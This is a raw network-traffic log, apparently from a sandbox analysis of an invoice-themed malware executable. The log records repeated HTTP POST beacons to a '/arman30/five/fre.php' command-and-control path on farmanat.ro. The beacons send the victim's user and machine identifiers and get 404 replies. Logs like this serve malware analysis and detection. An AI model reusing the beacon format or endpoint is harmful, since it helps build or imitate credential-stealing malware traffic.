Nov 25, 2021 10:51:39.110251904 CET	6891	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:51:39.143500090 CET	6892	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:51:39.201595068 CET	6892	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:51:38 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
411	192.168.11.20	50255	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:51:39.626538992 CET	6893	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:51:39.660751104 CET	6893	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:51:39.712763071 CET	6893	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:51:38 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
412	192.168.11.20	50256	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:51:40.142401934 CET	6894	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:51:40.176708937 CET	6894	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:51:40.228552103 CET	6895	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:51:39 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
413	192.168.11.20	50257	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:51:40.656007051 CET	6895	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:51:40.689590931 CET	6896	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:51:40.739022970 CET	6896	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:51:39 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
414	192.168.11.20	50258	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:51:41.141474009 CET	6897	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:51:41.175769091 CET	6897	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:51:41.226566076 CET	6897	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:51:40 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
415	192.168.11.20	50259	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:51:41.613563061 CET	6898	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:51:41.647212029 CET	6898	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:51:41.698240042 CET	6899	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:51:40 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
416	192.168.11.20	50260	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:51:42.168917894 CET	6899	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:51:42.202502012 CET	6900	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:51:42.252224922 CET	6900	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:51:41 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
417	192.168.11.20	50261	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:51:42.653882027 CET	6901	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:51:42.688277960 CET	6901	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:51:42.738009930 CET	6901	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:51:41 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
418	192.168.11.20	50262	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:51:43.154211998 CET	6902	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:51:43.187589884 CET	6902	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:51:43.237607956 CET	6903	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:51:42 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
419	192.168.11.20	50263	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:51:43.663132906 CET	6903	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:51:43.697297096 CET	6904	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:51:43.746808052 CET	6904	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:51:42 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
42	192.168.11.20	49878	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:48:28.858505011 CET	6368	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:48:28.892165899 CET	6369	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:48:28.941189051 CET	6369	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:48:27 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
420	192.168.11.20	50264	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:51:44.124896049 CET	6905	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:51:44.158967972 CET	6905	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:51:44.213745117 CET	6905	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:51:43 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
421	192.168.11.20	50265	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:51:44.645262957 CET	6906	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:51:44.678891897 CET	6906	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:51:44.730153084 CET	6907	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:51:43 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
422	192.168.11.20	50266	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:51:45.106868029 CET	6907	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:51:45.140907049 CET	6908	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:51:45.199707031 CET	6908	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:51:44 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
423	192.168.11.20	50267	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:51:45.594588995 CET	6909	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:51:45.628153086 CET	6909	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:51:45.682820082 CET	6909	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:51:44 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
424	192.168.11.20	50268	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:51:46.101808071 CET	6910	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:51:46.135593891 CET	6910	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:51:46.186052084 CET	6911	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:51:45 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
425	192.168.11.20	50269	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:51:46.597645998 CET	6911	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:51:46.631548882 CET	6912	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:51:46.688225985 CET	6912	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:51:45 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
426	192.168.11.20	50270	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:51:47.109618902 CET	6913	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:51:47.143276930 CET	6913	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:51:47.194964886 CET	6913	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:51:46 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
427	192.168.11.20	50271	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:51:47.611890078 CET	6914	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:51:47.646148920 CET	6914	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:51:47.698836088 CET	6915	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:51:46 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
428	192.168.11.20	50272	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:51:48.126750946 CET	6915	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:51:48.161307096 CET	6916	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:51:48.213126898 CET	6916	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:51:47 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
429	192.168.11.20	50273	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:51:48.626426935 CET	6917	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:51:48.659986019 CET	6917	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
